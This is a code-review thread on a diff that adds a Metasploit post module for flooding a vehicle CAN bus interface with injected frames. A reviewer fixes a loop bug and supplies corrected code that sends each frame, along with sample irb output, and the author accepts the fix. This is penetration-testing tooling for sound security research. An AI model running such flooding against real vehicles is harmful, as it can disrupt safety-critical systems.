modules/post/hardware/automotive/can_flood.rb

```diff
@@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Post
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'can_flood',
+        'Description' => 'Module that floods a CAN interface',
+        'License' => MSF_LICENSE,
+        'Author' => ['Pietro Biondi'],
+        'DisclosureDate' => ['March 20 2019'],
+        'Platform' => ['hardware'],
+        'SessionTypes' => ['hwbridge']
+      )
+    )
+    register_options(
+      [
+        OptInt.new('ROUND_NUMBER', [false, 'Number of executed rounds', 200]),
+        OptString.new('CANBUS', [false, 'CAN interface', nil]),
+        OptString.new('FRAMELIST', [true, 'Path to FRAMELIST', ::File.join(Msf::Config.data_directory, 'wordlists', 'frameListCanBus.txt')])
+      ]
+    )
+  end
+
+  def run
+    print_status(' -- OPENING FRAMELIST FILE --')
+    unless ::File.exist? datastore['FRAMELIST']
+      print_error "Frame list file '#{datastore['FRAMELIST']}' does not exist"
+      return
+    end
+    lines = File.readlines(datastore['FRAMELIST']).map { |line| line.strip }
+    print_status(' -- FLOODING -- ')
+    (0..datastore['ROUND_NUMBER']).each do
+      for i in 0..lines.length - 1
+        frame = lines.map { |s| s.split('+') }
```

Comment:
Confirming: you're definitely splitting `lines` and not each line?

Depending on your goal here, you might be able to do something like this:

```ruby
    datastore['ROUND_NUMBER']).times do
      lines.each do |line|
        frame = line.split('+')
        client.automotive.cansend(datastore['CANBUS'], frame[0], frame[1])
      end
    end
```

I think that's what you're trying to do?

Here's some mockup code:

```ruby
    lines = File.readlines('/tmp/asdf').map { |line| line.strip }
    20.times do
      lines.each do |line|
        frame = line.split('+')
        puts "FRAME 0: #{frame[0]}"
        puts "FRAME 1: #{frame[1]}"
      end
    end
```

And here's how it would be interpreted:

```
irb(main):001:0>     lines = File.readlines('/tmp/asdf').map { |line| line.strip }
=> ["244+0000009999", "188+030000", "19b+00000F", "19b+000010"]
irb(main):002:0>     20.times do
irb(main):003:1*       lines.each do |line|
irb(main):004:2*         frame = line.split('+')
irb(main):005:2>         puts "FRAME 0: #{frame[0]}"
irb(main):006:2>         puts "FRAME 1: #{frame[1]}"
irb(main):007:2>       end
irb(main):008:1>     end
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
FRAME 0: 244
FRAME 1: 0000009999
FRAME 0: 188
FRAME 1: 030000
FRAME 0: 19b
FRAME 1: 00000F
FRAME 0: 19b
FRAME 1: 000010
=> 20
irb(main):009:0> 
```

Reply:
Yes, that is just what I was trying to do.
I follow your suggestion. Thank you